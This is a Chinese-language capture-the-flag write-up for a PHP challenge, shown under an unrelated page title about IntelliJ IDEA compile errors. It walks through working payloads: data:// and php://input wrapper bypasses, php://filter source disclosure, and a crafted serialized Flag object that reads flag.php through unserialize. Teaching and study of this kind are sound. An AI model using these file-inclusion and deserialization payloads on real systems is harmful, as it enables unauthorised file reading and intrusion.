2. 程式人生 > 其它 >程式碼沒問題IDEA編譯不通過的終極解決方案

程式碼沒問題IDEA編譯不通過的終極解決方案

阿新 發佈:2021-11-08

一、靶場首頁(題目原始碼)

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){     #file_get_contents() 函式是用於將檔案的內容讀入到一個字串中的首選方法
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){    # preg_match 函式用於執行一個正則表示式匹配。
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

從程式碼可以看出首先是需要get傳參text,file,password。再往下可以確定text要求傳入檔案,且內容為welcome to the zjctf,可以通過偽協議傳入;file需要通過檔案包含一個檔名,且雖然正則過濾了flag,但提示了useless.php,所以可以也利用偽協議讀取。

二、第一個繞過點

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

$text需要輸入"welcome to the zjctf"並傳入檔案中,可以將內容寫入data偽協議中(一般為了繞過一些過濾會進行base64編碼),讓file_get_contents函式讀取。也可以通過php://input偽協議用post的方式傳入"welcome to the zjctf"

data偽協議:

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

php://input偽協議

url:http://xxxx:xxxx/?text=php://input
POST資料:welcome to the zjctf

三、第二個繞過點

if(preg_match("/flag/",$file)){    # preg_match 函式用於執行一個正則表示式匹配。
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);  # 反序列化
        echo $password;
    }

$file無法直接讀取flag,可以直接讀取/etc/passwd,但針對php檔案還需要進行base64編碼,否則讀取不到其內容。所以無法使用file=useless.php,可以使用php://filter偽協議來讀原始碼(使用其自帶的base64過濾器)

file=php://filter/read=convert.base64-encode/resource=useless.php

構造payload如下:

http://xxxx:xxxx/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

得到一串編碼:

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=

進行base64解碼即可得到useless.php原始碼

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

四、第三個繞過點

include($file);  //useless.php
$password = unserialize($password);  # 反序列化
echo $password;

現在只需要在檔案內包含了useless.php檔案後,利用unserialize()函式進行反序列化即可執行Flag類內的__tostring函式。

通俗一點解釋,就是將一個序列化後的物件即一串字串傳給$password,經過反序列化會得到一個例項物件。那麼如果將一個useless.php中的Flag物件(其中$file引數的值為flag.php)序列化後得到的字串傳給$password,經過反序列化後就會變成了一個例項物件。

在本地執行下面程式碼:

<?php  
class Flag{
    public $file='flag.php';  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
} 
$password=new Flag(); 
echo serialize($password);
?>

結果為:

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最終的payload:

http://xxxx:xxxx/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}

file=php://filter/read=convert.base64-encode/resource=useless.php只能讀取檔案內容,不能執行。

如果最終payload需要能夠執行Flag類中的東西,就必須要被“包含”而不是“被讀取”,所以要用file=useless.php實現flag類中的file_get_contents執行讀取flag。

五、get一個小flag

六、參考連結

https://www.redmango.top/article/13

https://blog.csdn.net/qq_45290991/article/details/113852174

https://www.cnblogs.com/gaonuoqi/p/12255777.html

相關推薦

程式碼問題IDEA編譯通過終極解決方案

今天被這個IDEA工具的編譯問題搞鬱悶,程式碼很確定是ok的,直接maven命令編譯也是ok的,但是IDEA直接執行死活就是不通過。一番折騰,問題最終還是被我給解決了。故總結一番,以防後續繼續採坑。

Android Studio3.6.+ 外掛搜尋終極解決方案(圖文詳解)

知道什麼時候Android Studio 外掛和Gradle升級後,外掛線上安裝就搜尋到外掛了,一直處於轉圈圈狀態,通過各種測試和摸索總結出幾種解決方案。我的Android Studio已經升級到3.6.3.

idea-修改程式碼能實時編譯終極解決方案

一、出處: https://my.oschina.net/fdblog/blog/172229 https://www.cnblogs.com/hejj-bk/p/13384902.html

IDEA 卡住buid(編譯)動的解決辦法

【號外號外!】 最終解決辦法並不複雜,關鍵在於“遇見問題,怎麼樣層層分析,多條路徑試錯,最終解決問題的思路或者能力”——資深碼農的核心競爭力之一

win10系統下載cad軟體通過怎麼辦?win10系統下載cad通過解決方法

cad是一款繪圖工具,相信設計人員對此軟體都陌生了。之前使用的win7系統下載安裝cad軟體都問題,升級win10系統後安裝卻一直不通過,導致我們無法繼續使用繪圖,在這種情況下,小編和大家詳細講解一下win10系統下

IntelliJ IDEA多屏後窗口顯示問題解決方案

IDEA 在接入外接屏且擴充套件的情況下,如果突然拔掉外接屏,就可能會產生IDEA 整個視窗只在螢幕的右側顯示一點點邊框且無法拖拽到當前螢幕的情況。

關於idea一直卡在build動的解決方案

就一直這樣,卡在這兒,動,也報錯,也沒有報錯日誌。 以下是我嘗試的解決方案

IDEA 卡住動的解決辦法,超級管用。。。

來源:https://www.jianshu.com/p/12c5392716bb 出現這個問題之前是這樣的:筆記本突然藍屏罷工,重啟後,開啟IDEA,匯入專案的時候,indexing一直在轉圈,大概轉了十幾分鍾都動,重啟也沒用。

golang定時任務踩坑及終極解決方案

前言 國慶閒來無事,把之前開源的一個定時任務排程中心重構了一下。 期間遇到了一些crontab的坑

詳解WMI RPC 伺服器可用的解決方案

本文介紹了詳解WMI RPC 伺服器可用的解決方案,分享給大家,具體如下: ConnectionOptions connectionOptions = new ConnectionOptions();

詳解關於AndroidQ獲取到imsi解決方案

Android Q 禁止獲取 IMEI 和裝置序列號; 官方的解決方案是這樣:https://developer.android.com/training/articles/user-data-ids

Sql server埠未開啟連線上的解決方案

前言 今天manager佈置了個任務是檢查一下server上的 sql server為什麼連線上的問題,我以前從沒用過sql server。先遠端到server在的機器上,照著網上的教程搞了一通,沒什麼卵用。

詳解python 降級到3.6終極解決方案

最近因為要安裝Tensorflow,然後發現tensorflow居然支援python3.7,於是怒而將其降級到3.6

終極解決方案】為應用程式池“XXX”提供服務的程序在與 Windows Process Activation Service 通訊時出現嚴重錯誤。該程序 ID 為“XXXX”。資料欄位包含錯誤號。

文章來源——https://www.cnblogs.com/qidian10/p/6028784.html http://www.cnblogs.com/freeton/archive/2012/08/28/2660585.html

Javascript非同步執行按順序解決方案

案例分析: 比如執行懶載入時候,onscroll 事件觸發多次事件時候會呼叫多次 ajax 回撥事件,由於每個事件返回先後次序並不能保證和觸發前一致,所以在資料響應返回後所新增的資料順序就很在 push 到陣列上順序一致

Pyecharts地圖顯示完成問題解決方案

官網給的解釋如下: 自從 0.3.2 開始,為了縮減專案本身的體積以及維持 pyecharts 專案的輕量化執行,pyecharts 將不再自帶地圖 js 檔案。

Win10無法修改檔案的預設開啟方式怎麼解決_win10檔案預設開啟方式能修改解決方案

電腦中每種軟體或者檔案都有其預設的開啟方式,我們也可以自定義修改為一種自己喜歡的開啟方式,可是有win10系統使用者卻遇到無法修改檔案的預設開啟方式的情況,該怎麼辦呢,小編就給大家分享一下win10檔案預設開啟

phpmyadmin在寶塔面板裡進去的解決方案

在寶塔面板裡裝完phpmyadmin但是進去資料庫的這種情況太常見了, 很多人都買了伺服器,裝完了寶塔面板,但是十個人得有八個人進去phpmyadmin,我總結了以下三種解決方案

Vue路由切換頁面更新問題解決方案

前言:vue-router的切換同於傳統的頁面的切換。路由之間的切換,其實就是元件之間的切換,是真正的頁面切換。這也會導致一個問題,就是引用相同元件的時候,會導致該元件無法更新,也就是我們口中的頁面無法更新

Object.assign()深拷貝的用法、以及在IE瀏覽器相容的解決方案

原文連結:https://blog.csdn.net/lgysjfs/java/article/details/91429600 1、Object.assign()的用法